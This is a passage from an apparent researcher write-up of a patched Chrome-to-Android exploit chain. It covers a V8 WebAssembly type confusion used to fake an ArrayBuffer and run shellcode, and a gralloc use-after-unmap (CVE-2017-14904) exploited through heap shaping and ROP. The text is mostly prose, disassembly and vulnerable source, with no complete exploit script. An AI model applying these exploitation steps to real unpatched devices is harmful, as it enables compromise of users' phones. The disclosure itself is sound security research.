Not only the instruction “call 0” can be modified, any “call funcx” instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript:

/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)

/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop

Safepoints (size = 8)

RelocInfo (size = 0)

--- End code ---

When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If “call funcx” is modified to call the following JS_TO_WASM function.

/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>

The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows:

/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map                                                                                                                                                       
Properties                                                                                                                                                
Elements                                                                                                                                                  
ByteLength                                                                                                                                                
BackingStore                                                                                                                                              
AllocationBase                                                                                                                                            
AllocationLength                                                                                                                                          
Fields                                                                                                                                                    
internal                                                                                                                                                  
internal                                                                                                                                                                                                                                                                                                      


/* Map layouts 44 Bytes*/                                                                                                                                   
static kMapOffset = 0,                                                                                                                                    
static kInstanceSizesOffset = 4,                                                                                                                          
static kInstanceAttributesOffset = 8,                                                                                                                     
static kBitField3Offset = 12,                                                                                                                             
static kPrototypeOffset = 16,                                                                                                                             
static kConstructorOrBackPointerOffset = 20,                                                                                                              
static kTransitionsOrPrototypeInfoOffset = 24,                                                                                                            
static kDescriptorsOffset = 28,                                                                                                                           
static kLayoutDescriptorOffset = 1,                                                                                                                       
static kCodeCacheOffset = 32,                                                                                                                             
static kDependentCodeOffset = 36,                                                                                                                         
static kWeakCellCacheOffset = 40,                                                                                                                         
static kPointerFieldsBeginOffset = 16,                                                                                                                    
static kPointerFieldsEndOffset = 44,                                                                                                                      
static kInstanceSizeOffset = 4,                                                                                                                           
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,                                                                                           
static kUnusedOffset = 6,                                                                                                                                 
static kVisitorIdOffset = 7,                                                                                                                              
static kInstanceTypeOffset = 8,     //one byte                                                                                                            
static kBitFieldOffset = 9,                                                                                                                               
static kInstanceTypeAndBitFieldOffset = 8,                                                                                                                
static kBitField2Offset = 10,                                                                                                                             
static kUnusedPropertyFieldsOffset = 11

Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer’s properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode.

Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit.

The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:

static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}

gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome’s sandboxed process, so it’s possible to unmap any pages in system_server from Chrome’s sandboxed render process.

static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}

int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}

Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services.

52neverallow isolated_app {
53    service_manager_type
54    -activity_service
55    -display_service
56    -webviewupdate_service
57}:service_manager find;

To trigger the aforementioned Use-After-Unmap bug from Chrome’s sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.

This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome’s Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app. 

To exploit this EoP bug:

1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping:

7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f58000000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......

2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug:

7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

3. Fill the unmapped space with an ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)

4. Spray the heap and the heap data will be written to the ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome’s render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module’s base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven’t been used. It’s impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP.

typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;

    /* the sizeof() of the actual EGL native type */
    int version;

    void* reserved[4];

    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;

6.Trigger a GC to execute ROP

When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf .

Summary

The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities.

The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort.

Page 1 of 2
Scroll Up